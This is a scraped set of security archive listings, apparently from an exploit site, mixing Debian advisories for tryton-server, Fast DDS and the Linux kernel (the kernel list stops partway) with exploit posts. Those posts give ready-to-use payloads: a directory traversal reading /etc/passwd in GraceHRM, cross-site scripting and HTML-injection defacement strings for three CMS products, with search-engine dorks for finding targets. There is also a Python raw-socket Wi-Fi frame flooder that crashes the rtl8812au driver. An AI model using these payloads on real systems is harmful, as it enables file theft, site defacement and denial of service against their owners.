Debian Linux Security Advisory 5482-1 - Edbo and Cedric Krier discovered that the Tryton application server does enforce record rules when only reading fields without an SQL type.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5482-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 24, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tryton-server  
CVE ID         : not yet available

"Edbo" and Cedric Krier discovered that the Tryton application server  
does enforce record rules when only reading fields without an SQL type  
(like Function fields).

For the oldstable distribution (bullseye), this problem has been fixed  
in version 5.0.33-2+deb11u2.

For the stable distribution (bookworm), this problem has been fixed in  
version 6.0.29-2+deb12u1.

We recommend that you upgrade your tryton-server packages.

For the detailed security status of tryton-server please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tryton-server

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTnqjsACgkQEMKTtsN8  
TjbcjBAAmjWzeNl1H7A9skD50+wxRyOBQK+lrqpEcCekIit699viinOKJq4kKzsW  
/oZzZ8w+a/mKgcz9VgYUDuFE30h1kA43dMY9sb4GDpKRvXUGQ0bkbOYCBmktw+u1  
IWvYMccmTDCq9tnLh8yyrNV/q1/ZE2ZmC5ek2ASiXtmLKCYR3UoHxPjAHmYayD+o  
vVvPtmQ5/REr76+VCKupThY2+/Om4sxoeBoUvzH1O99QY5Na1QSZR1yfYzuTOF67  
LaiqwkTqiLr4kRtfE1ngcjuqWHrpOC14K7rMSn29sIYJLGQ0ILjpN73snZuUvlVz  
AAX+p1q61l/8mEJrMcDA//Qr1jMlZS4dk9SlkCfPofekFLv160pihc83NGJh/vPn  
KH62Bp71Fk9BLOqJOonITEHEoIrglecylwyjOy8cbg0X7AkaeLufZZjRV1VUS0yX  
Ff4n2qWMTjGEzqZeW9PVA6TTQ9ecSNfHzUF9qanI5F0eobSzhd4GefS9L6FL+hYi  
fZ9Em29e8y5SnQ+ePXCaBq5E78HIGb6f/+i2bzyRjAcaCKN4g0fO4PVIFXbmGHCC  
Wbp1DLX4T2Dpu5O60MtdlBjd538MSS7LLrvqcnaQNfNoD9ujEysM12BWP33QhwVK  
k4vrcxoQBj0P1vB08zQ3GhDfp6j9AxNLHDL5TP8gr1vJzmZfw5U=1vl7  
-----END PGP SIGNATURE-----

Debian Security Advisory 5482-1

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

**G And G Corporate CMS 1.0 Cross Site Scripting**

Posted Aug 23, 2023

Authored by indoushka

G and G Corporate CMS version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ec7e6459653c2e6f1683c120c47e58e61d870a911a466497ef2ef99455a30669

Download | Favorite | View

**G And G Corporate CMS 1.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : G&G Corporate CMS v1.0  XSS Vulnerability                                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://gegweb.it                                                                                                   |  | # Dork      : intext:Powered by Studio G&G Corporate Communication site:it                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /prodotti.php?LANG=2&id=prodotti&CAT=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://priolinoxit/prodotti.php?LANG=2&id=prodotti&CAT=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

G And G Corporate CMS 1.0 Cross Site Scripting

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

**FreshRSS 1.11.1 HTML Injection**

Posted Aug 23, 2023

Authored by indoushka

FreshRSS version 1.11.1 suffers from an html injection vulnerability.

tags | exploit

SHA-256 | c789b4001ff7c396e22af1e82b8f9c8c3a4f13f593828eb66d0a73226d79294b

Download | Favorite | View

**FreshRSS 1.11.1 HTML Injection**

    ====================================================================================================================================| # Title     : FreshRSS v1.11.1 Html Inject Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://freshrss.org/                                                                                              |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+]  https://demo127.0.0.1/freshrssorg/i/?c=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,006)
*   Arbitrary (16,212)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,952)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,147)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,799)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,186)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,383)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,953)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,504)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,750)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,835)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FreshRSS 1.11.1 HTML Injection

An issue was discovered in function nl80211_send_chandef in rtl8812au v5.6.4.2 allows attackers to cause a denial of service.

**testing environment**  
root@kali:~# uname -r  
5.6.0-kali2-amd64

**poc:**  
\`

#!/usr/bin/env python  
#coding=utf-8  
import time  
import socket

AP\_MAC = "00:22:66:88:22:00"  
STA\_MAC = "00:13:ef:f1:04:ef"  
ETH\_P\_ALL = 3  
IFACE = "wlan0"

def mac2str(mac):  
return "".join(map(lambda x: chr(int(x, 16)), mac.split(":")))

RADIO = "\\x00"  
RADIO += "\\x00"  
RADIO += "\\x24\\x00"  
RADIO += "\\x2f\\x40\\x00\\xa0"  
RADIO += "\\x20\\x08\\x00\\x00"  
RADIO += "\\x00\\x00\\x00\\x00"  
RADIO += "\\x27"  
RADIO += "\\x43"  
RADIO += "\\x6e\\x25"  
RADIO += "\\xa0\\x00"  
RADIO += "\\x00\\x00"  
RADIO += "\\x10\\x02"  
RADIO += "\\x6c\\x09"  
RADIO += "\\xa0\\x00"  
RADIO += "\\xd0\\x00"  
RADIO += "\\x00"  
RADIO += "\\x00"  
RADIO += "\\xd0"  
RADIO += "\\x00"

AUTH\_REQ\_OPEN = RADIO + "\\xB0" # Type/Subtype  
AUTH\_REQ\_OPEN += "\\x08" # Flags  
AUTH\_REQ\_OPEN += "\\xc3\\x50" # Duration ID  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # Desti8nation address  
AUTH\_REQ\_OPEN += mac2str(STA\_MAC) # Source address  
AUTH\_REQ\_OPEN += mac2str(AP\_MAC) # BSSID  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Sequence control  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication algorithm (open)  
AUTH\_REQ\_OPEN += "\\x01\\x00" # Authentication sequence number  
AUTH\_REQ\_OPEN += "\\x00\\x00" # Authentication status  
AUTH\_REQ\_OPEN += "\\x1f\\xd8" # Authentication status  
AUTH\_REQ\_OPEN += "\\x5a\\x07" # Authentication status  
AUTH\_REQ\_HDR = AUTH\_REQ\_OPEN\[:-6\]

def start\_fuzz():  
s = socket.socket(socket.AF\_PACKET, socket.SOCK\_RAW, socket.htons(ETH\_P\_ALL))  
s.bind((IFACE, ETH\_P\_ALL))  
while True:  
print("send msg:",AUTH\_REQ\_OPEN)  
s.send(AUTH\_REQ\_OPEN)

def main():  
start\_fuzz()

if **name** == "**main**":  
main()  
\`  
when execute poc, we should turn on monitoring mode：  
ip link set wlan0 down  
iw dev wlan0 set type monitor  
ip link set wlan0 up

**result**

[  952.607304] WARNING: CPU: 0 PID: 1293 at net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607304] Modules linked in: nfnetlink_queue(E) nfnetlink_log(E) 88XXau(OE) nfnetlink(E) bluetooth(E) drbg(E) ansi_cprng(E) ecdh_generic(E) ecc(E) cfg80211(E) rfkill(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vmw_vsock_vmci_transport(E) vsock(E) intel_rapl_msr(E) intel_rapl_common(E) intel_rapl_perf(E) vmw_balloon(E) joydev(E) serio_raw(E) pcspkr(E) sg(E) vmw_vmci(E) evdev(E) ac(E) binfmt_misc(E) fuse(E) sunrpc(E) ip_tables(E) x_tables(E) autofs4(E) ext4(E) crc16(E) mbcache(E) jbd2(E) crc32c_generic(E) sd_mod(E) t10_pi(E) crc_t10dif(E) crct10dif_generic(E) crct10dif_pclmul(E) crct10dif_common(E) crc32_pclmul(E) crc32c_intel(E) ghash_clmulni_intel(E) hid_generic(E) usbhid(E) hid(E) sr_mod(E) cdrom(E) ata_generic(E) vmwgfx(E) aesni_intel(E) libaes(E) crypto_simd(E) cryptd(E) glue_helper(E) ttm(E) psmouse(E) drm_kms_helper(E) ata_piix(E) cec(E) uhci_hcd(E) ehci_pci(E) xhci_pci(E) xhci_hcd(E) e1000(E) ehci_hcd(E) usbcore(E) usb_common(E) mptspi(E) mptscsih(E) mptbase(E) [  952.607325]  scsi_transport_spi(E) drm(E) libata(E) i2c_piix4(E) scsi_mod(E) button(E) [  952.607329] CPU: 0 PID: 1293 Comm: RTW_CMD_THREAD Tainted: G           OE     5.6.0-kali2-amd64 #1 Debian 5.6.14-1kali1 [  952.607330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/29/2019 [  952.607340] RIP: 0010:nl80211_send_chandef+0x14b/0x160 [cfg80211] [  952.607341] Code: 00 00 be a1 00 00 00 48 89 ef 89 44 24 04 e8 7c 8a 07 d6 85 c0 0f 84 7b ff ff ff 41 bc 97 ff ff ff e9 70 ff ff ff 31 c0 eb a7 <0f> 0b 41 bc ea ff ff ff e9 5f ff ff ff e8 c3 c7 cb d5 0f 1f 00 0f [  952.607342] RSP: 0018:ffffa687c088fd80 EFLAGS: 00010246 [  952.607343] RAX: 0000000000000000 RBX: ffffa687c088fe08 RCX: 0000000000000087 [  952.607343] RDX: 00000000c07597ec RSI: 00000000ffff259c RDI: ffffa687c088fe08 [  952.607344] RBP: ffff98e22da4dd00 R08: 0000000000000003 R09: 0000000000000004 [  952.607344] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa687c088fe08 [  952.607344] R13: 0000000000000000 R14: ffff98e22da4dd00 R15: ffff98e2343a3014 [  952.607345] FS:  0000000000000000(0000) GS:ffff98e23be00000(0000) knlGS:0000000000000000 [  952.607346] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [  952.607346] CR2: 00007f9224153030 CR3: 000000007a080005 CR4: 00000000002606f0 [  952.607365] Call Trace: [  952.607395]  nl80211_ch_switch_notify.constprop.0+0xcd/0x170 [cfg80211] [  952.607424]  rtw_cfg80211_ch_switch_notify+0x138/0x147 [88XXau] [  952.607440]  ? rtw_chk_start_clnt_join+0x79/0x79 [88XXau] [  952.607454]  rtw_chk_start_clnt_join+0x72/0x79 [88XXau] [  952.607468]  join_cmd_hdl+0x267/0x373 [88XXau] [  952.607476]  rtw_cmd_thread+0x295/0x3ed [88XXau] [  952.607494]  kthread+0xf9/0x130 [  952.607504]  ? rtw_stop_cmd_thread+0x39/0x39 [88XXau] [  952.607506]  ? kthread_park+0x90/0x90 [  952.607521]  ret_from_fork+0x35/0x40 [  952.607524] ---[ end trace c0d1960d55eb317c ]---

CVE-2020-26652: fuzzing wifi ,network will down,  result is net/wireless/nl80211.c:3159 nl80211_send_chandef+0x14b/0x160 [cfg80211] · Issue #730 · aircrack-ng/rtl8812au

An issue was discovered in hwclock.13-v2.27 allows attackers to gain escalated privlidges or execute arbitrary commands via the path parameter when setting the date.

CVE-2020-21583: #786804 - hwclock(8) SUID privilege escalation

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

**FoccusWeb CMS 0.1 Cross Site Scripting**

Posted Aug 22, 2023

Authored by indoushka

FoccusWeb CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 4ec7d01c602a400932502d010a16a7b1bacb2f323fbd9f44c16aef7baacd0231

Download | Favorite | View

**FoccusWeb CMS 0.1 Cross Site Scripting**

    ======================================================================================================================================| # Title     : FoccusWeb CMS v0.1 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                               | | # Vendor    : http://www.foccusweb.com/site/                                                                                       |  ======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /resultados.html?txt-busca=1<script>alert(/indoushka/);</script>&yt0=submit[+] http://127.0.0.1/saogabrielrsgovbr/Portal/busca/resultados.html?txt-busca=1%3Cscript%3Ealert(/indoushka/);%3C/script%3E&yt0=submitGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,996)
*   Arbitrary (16,211)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,347)
*   DoS (23,452)
*   Encryption (2,370)
*   Exploit (51,936)
*   File Inclusion (4,222)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,782)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,146)
*   Proof of Concept (2,338)
*   Protocol (3,602)
*   Python (1,535)
*   Remote (30,795)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,888)
*   Shell (3,185)
*   Shellcode (1,215)
*   Sniffer (894)
*   Spoof (2,207)
*   SQL Injection (16,380)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,786)
*   Web (9,669)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,949)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,494)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,741)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,834)
*   UNIX (9,291)
*   UnixWare (186)
*   Windows (6,574)
*   Other

FoccusWeb CMS 0.1 Cross Site Scripting

Debian Linux Security Advisory 5481-1 - Multiple security issues were discovered in Fast DDS, a C++ implementation of the DDS (Data Distribution Service), which might result in denial of service or potentially the execution of arbitrary code when processing malformed RTPS packets.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5481-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 20, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : fastdds  
CVE ID         : CVE-2023-39534 CVE-2023-39945 CVE-2023-39946 CVE-2023-39947   
                 CVE-2023-39948 CVE-2023-39949

Multipe security issues were discovered in Fast DDS, a C++ implementation  
of the DDS (Data Distribution Service), which might result in denial of  
service or potentially the execution of arbitrary code when processing  
malformed RTPS packets.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.1.0+ds-9+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.9.1+ds-1+deb12u1.

We recommend that you upgrade your fastdds packages.

For the detailed security status of fastdds please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/fastdds

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmTiT8EACgkQEMKTtsN8  
TjYjMRAAhNc26qPpZ0p9Jnbujlg6M6j1YFLLSv0wBH0bwG41mJthfVaB7pjPWhS1  
jABPZ8whfOwPXqigcXWSpDqVO0JrVzyI2uLtyrm0TNaf1y8extPrqQRL1epPNJvh  
AjXjX+CSRSSp20mEGr9bYg2a/FWnt60Vx+enyWd3xJE0KLucfkstNkD5cNv8Szxz  
I/Qnb5bnmjEE1UKzaZgOLaw1rciCAvlsmoORMqps+FxIXm1KqdGtLKBNta3Y/vrr  
QQMrK+oCsQkclQeC5Zm5BT6TNuRz7g6imEFP5bZCEkX0XNnZpF1tCSOSQ9z0CR3B  
4QuGhV8jIcArTwLEns5U3yZr8XgSqiXAoAdL8uVBZ1a67ZFktz2riKz8AYAQiBhj  
o58N4aYxjQnqw5h6OmIiuwl3QuYW1AhTQ5JyLNBrhBx/xBLznZtWkg5YBi3lzOVQ  
KIh7fOO0lzpkgXVgf4ggeBuF9K/8fes89QjlIN3PzUYiVAA/Uu0XpTCocBALlsKP  
rv5eZJkxKAyqrcCGzOBodhoMOKm+SeCKhrc/t2kQnD9G0MPk7eY/Gm26Oms0FHzE  
IR5gcPvnIQ0p+N2psu/YNxboeBrycxxN2nCnjAReO4U4kcfycOCG66ogTGWEEUb0  
/UbqHYjBiC3Z/wDzYtE8tni9HktHn0E1aYj5xgdtc4X92TioNrE=  
=ALwP  
-----END PGP SIGNATURE-----

Debian Security Advisory 5481-1

Debian Linux Security Advisory 5480-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5480-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
August 18, 2023                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2022-4269 CVE-2022-39189 CVE-2023-1206 CVE-2023-1380  
                 CVE-2023-2002 CVE-2023-2007 CVE-2023-2124 CVE-2023-2269  
                 CVE-2023-2898 CVE-2023-3090 CVE-2023-3111 CVE-2023-3212  
                 CVE-2023-3268 CVE-2023-3338 CVE-2023-3389 CVE-2023-3609  
                 CVE-2023-3611 CVE-2023-3776 CVE-2023-3863 CVE-2023-4004  
                 CVE-2023-4128 CVE-2023-4132 CVE-2023-4147 CVE-2023-4194  
                 CVE-2023-4273 CVE-2023-20588 CVE-2023-21255 CVE-2023-21400  
                 CVE-2023-31084 CVE-2023-34319 CVE-2023-35788 CVE-2023-40283

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2022-4269

    William Zhao discovered that a flaw in the Traffic Control (TC)  
    subsystem when using a specific networking configuration  
    (redirecting egress packets to ingress using TC action "mirred"),  
    may allow a local unprivileged user to cause a denial of service  
    (triggering a CPU soft lockup).

CVE-2022-39189

    Jann Horn discovered that TLB flush operations are mishandled in the  
    KVM subsystem in certain KVM_VCPU_PREEMPTED situations, which may  
    allow an unprivileged guest user to compromise the guest kernel.

CVE-2023-1206

    It was discovered that the networking stack permits attackers to  
    force hash collisions in the IPv6 connection lookup table, which may  
    result in denial of service (significant increase in the cost of  
    lookups, increased CPU utilization).

CVE-2023-1380

    Jisoo Jang reported a heap out-of-bounds read in the brcmfmac Wi-Fi  
    driver. On systems using this driver, a local user could exploit  
    this to read sensitive information or to cause a denial of service.

CVE-2023-2002

    Ruiahn Li reported an incorrect permissions check in the Bluetooth  
    subsystem. A local user could exploit this to reconfigure local  
    Bluetooth interfaces, resulting in information leaks, spoofing, or  
    denial of service (loss of connection).

CVE-2023-2007

    Lucas Leong and Reno Robert discovered a time-of-check-to-time-of-  
    use flaw in the dpt_i2o SCSI controller driver. A local user with  
    access to a SCSI device using this driver could exploit this for  
    privilege escalation.

    This flaw has been mitigated by removing support for the I2OUSRCMD  
    operation.

CVE-2023-2124

    Kyle Zeng, Akshay Ajayan and Fish Wang discovered that missing  
    metadata validation may result in denial of service or potential  
    privilege escalation if a corrupted XFS disk image is mounted.

CVE-2023-2269

    Zheng Zhang reported that improper handling of locking in the device  
    mapper implementation may result in denial of service.

CVE-2023-2898

    It was discovered that missing sanitising in the f2fs file  
    system may result in denial of service if a malformed file  
    system is accessed.

CVE-2023-3090

    It was discovered that missing initialization in ipvlan networking  
    may lead to an out-of-bounds write vulnerability, resulting in  
    denial of service or potentially the execution of arbitrary code.

CVE-2023-3111

    The TOTE Robot tool found a flaw in the Btrfs filesystem driver that  
    can lead to a use-after-free. It's unclear whether an unprivileged  
    user can exploit this.

CVE-2023-3212

    Yang Lan that missing validation in the GFS2 filesystem could result  
    in denial of service via a NULL pointer dereference when mounting a  
    malformed GFS2 filesystem.

CVE-2023-3268

    It was discovered that an out-of-bounds memory access in relayfs  
    could result in denial of service or an information leak.

CVE-2023-3338

    Davide Ornaghi discovered a flaw in the DECnet protocol  
    implementation which could lead to a null pointer dereference or  
    use-after-free. A local user can exploit this to cause a denial of service  
    (crash or memory corruption) and probably for privilege escalation.

    This flaw has been mitigated by removing the DECnet protocol  
    implementation.

CVE-2023-3389

    Querijn Voet discovered a use-after-free in the io_uring subsystem,  
    which may result in denial of service or privilege escalation.

CVE-2023-3611

    It was discovered that an out-of-bounds write in the traffic control  
    subsystem for the Quick Fair Queueing scheduler (QFQ) may result in  
    denial of service or privilege escalation.

CVE-2023-3609 / CVE-2023-3776 / CVE-2023-4128

    It was discovered that a use-after-free in the cls_fw, cls_u32,  
    cls_route and network classifiers may result in denial of service or  
    potential local privilege escalation.

CVE-2023-3863

    It was discovered that a use-after-free in the NFC implementation  
    may result in denial of service, an information leak or potential  
    local privilege escalation.

CVE-2023-4004

    It was discovered that a use-after-free in Netfilter's  
    implementation of PIPAPO (PIle PAcket POlicies) may result in denial  
    of service or potential local privilege escalation for a user with  
    the CAP_NET_ADMIN capability in any user or network namespace.

CVE-2023-4132

    A use-after-free in the driver for Siano SMS1xxx based MDTV  
    receivers may result in local denial of service.

CVE-2023-4147

    Kevin Rich discovered a use-after-free in Netfilter when adding a  
    rule with NFTA_RULE_CHAIN_ID, which may result in local privilege  
    escalation for a user with the CAP_NET_ADMIN capability in any user  
    or network namespace.

